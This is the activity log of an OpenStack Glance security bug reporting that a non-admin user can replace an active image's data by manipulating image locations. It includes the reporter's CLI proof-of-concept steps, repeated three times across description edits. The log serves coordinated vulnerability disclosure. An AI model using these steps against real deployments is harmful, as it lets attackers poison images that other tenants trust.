Glance

Bug #1549483
Activity log

Activity log for bug #1549483

Date	Who	What changed	Old value	New value	Message
2016-02-24 21:17:01	Mike Fedosin	bug			added bug
2016-02-24 21:48:00	Tristan Cacqueray	bug task added		ossa
2016-02-24 21:48:05	Tristan Cacqueray	ossa: status	New	Incomplete
2016-02-24 21:48:24	Tristan Cacqueray	description	Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in Glance repo. Unfortunately it partially fixed the problem and the issue with immutability still exists. Bug description: User (non admin) can change image data by updating location for image when "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows malicious user to replace data after image activation. mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public +------------------+--------------------------------------+ \| Property \| Value \| +------------------+--------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| size \| None \| \| status \| queued \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:41:53Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+--------------------------------------+ mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:21Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo I'm really good image. mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:29Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo All your base are belong to us! Muahahaha!	This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. -- Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in Glance repo. Unfortunately it partially fixed the problem and the issue with immutability still exists. Bug description: User (non admin) can change image data by updating location for image when "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows malicious user to replace data after image activation. mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public +------------------+--------------------------------------+ \| Property \| Value \| +------------------+--------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| size \| None \| \| status \| queued \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:41:53Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+--------------------------------------+ mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:21Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo I'm really good image. mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:29Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo All your base are belong to us! Muahahaha!
2016-02-24 21:49:33	Tristan Cacqueray	bug			added subscriber Glance Core security contacts
2016-02-24 21:58:24	Flavio Percoco	bug			added subscriber Fei Long Wang
2016-03-29 18:17:22	Tristan Cacqueray	bug			added subscriber OSSG CoreSec
2016-03-29 20:30:04	Travis McPeak	bug task added		ossn
2016-04-07 17:37:52	Travis McPeak	ossn: assignee		hyakuhei (hyakuhei)
2016-05-03 21:55:02	Tristan Cacqueray	ossa: status	Incomplete	Opinion
2016-05-31 19:54:58	Nikhil Komawar	glance: status	New	Confirmed
2016-05-31 19:55:54	Nikhil Komawar	glance: importance	Undecided	High
2016-05-31 19:56:38	Nikhil Komawar	bug			added subscriber Nova Core security contacts
2016-08-17 20:04:17	Travis McPeak	ossn: assignee	Robert Clark (robert-clark)	Travis McPeak (travis-mcpeak)
2016-08-17 20:11:08	Travis McPeak	ossn: assignee	Travis McPeak (travis-mcpeak)	Robert Clark (robert-clark)
2017-02-09 11:12:47	Luke Hinds	description	This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. -- Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in Glance repo. Unfortunately it partially fixed the problem and the issue with immutability still exists. Bug description: User (non admin) can change image data by updating location for image when "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows malicious user to replace data after image activation. mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public +------------------+--------------------------------------+ \| Property \| Value \| +------------------+--------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| size \| None \| \| status \| queued \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:41:53Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+--------------------------------------+ mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:21Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo I'm really good image. mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:29Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo All your base are belong to us! Muahahaha!	Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in Glance repo. Unfortunately it partially fixed the problem and the issue with immutability still exists. Bug description: User (non admin) can change image data by updating location for image when "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows malicious user to replace data after image activation. mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public +------------------+--------------------------------------+ \| Property \| Value \| +------------------+--------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| size \| None \| \| status \| queued \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:41:53Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+--------------------------------------+ mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:21Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo I'm really good image. mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt' +------------------+----------------------------------------------------------------------------------+ \| Property \| Value \| +------------------+----------------------------------------------------------------------------------+ \| checksum \| None \| \| container_format \| bare \| \| created_at \| 2015-11-10T18:41:53Z \| \| disk_format \| qcow2 \| \| file \| /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file \| \| id \| 2a745d21-66b7-43e0-90b5-ebe62232f7d6 \| \| locations \| [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": \| \| \| {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": \| \| \| {}}] \| \| min_disk \| 0 \| \| min_ram \| 0 \| \| name \| good \| \| owner \| f3b42d4b90d840b8806e46fb4a7edca3 \| \| protected \| False \| \| schema \| /v2/schemas/image \| \| size \| 43 \| \| status \| active \| \| tags \| [] \| \| updated_at \| 2015-11-10T18:42:29Z \| \| virtual_size \| None \| \| visibility \| public \| +------------------+----------------------------------------------------------------------------------+ mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt' mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo mfedosin@wdev:~$ cat ooo All your base are belong to us! Muahahaha!
2017-02-09 11:12:57	Luke Hinds	ossn: status	New	Fix Released
2017-02-09 11:13:09	Luke Hinds	information type	Private Security	Public
2017-02-09 14:34:52	Jeremy Stanley	tags		security